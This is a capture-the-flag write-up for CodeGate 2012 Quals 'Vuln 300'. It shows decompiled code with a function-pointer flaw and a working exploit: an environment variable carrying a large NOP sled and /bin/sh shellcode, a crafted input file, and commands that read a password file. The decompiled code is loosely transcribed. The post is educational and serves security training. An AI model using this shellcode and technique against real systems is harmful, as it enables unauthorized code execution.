CodeGate 2012 Quals – Vuln 300

Here we are given ssh credentials where we need to exploit the binary.

Summary: compose file to make program jump to stack.

Let’s decompile it the binary:

int func() {
    return 0;
int main(int argc, char *argv[]) {
    char s[12];
    memset(s, 0x90u, 0x12u);
    FILE *stream = fopen(argv[1], "r");
    if (stream) {
        int nread = fread(s, 1u, 0xCu, stream);
        if (nread == 12) {
            void (*ptr)() = func; // 0x08048540
            unsigned int b4 = (s[4] | 1) ^ 0xE0;
            unsigned int b3 = (s[1] | 1) ^ 0xE0;
            b3 <<= 16;
            b4 <<= 24;
            strncpy(test, s, 0x12u); // ???
            ptr = (b4 | b3 | ptr);
            return 0;
    return 1;

The algorithm is simple – 12 bytes are read from argv[1] and 2nd and 5th are used to modify ptr which is called later.

The stack here is executable, so it’s straightforward: we should make ptr pointing to stack to our payload.

The stack addresses here are like 0xbfbfXXXX. So, the needed symbol is
0xBF ^ 0xE0 = '_' or
0xBF ^ 0xE1 = '^'

So, if we put twelve “_” into a file, we’ll jump to 0xbfbf8540.

Then we just put this stuff into a file and push a huge nopsled with shellcode:

$ mkdir /tmp/solve
$ cd /tmp/solve
$ export SC="` perl -e 'print "\x90"x100000 . "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2\x52\x57\x54\xb0\x3b\xcd\x80\xe8\xee\xff\xff\xff/bin/sh";'`"
$ echo '^^^^^^^^^^^^^^^^^^^^^^^' >test
~/X ./test
$ cat ~/password

The flag: key_is_The_davinci_cod3_!


  1. yegreS says:

    What tools do you use to decompile binary?

    1. hellman says:

      You can use IDA with Hex-Rays ;) And some manual fixing

Leave a Reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>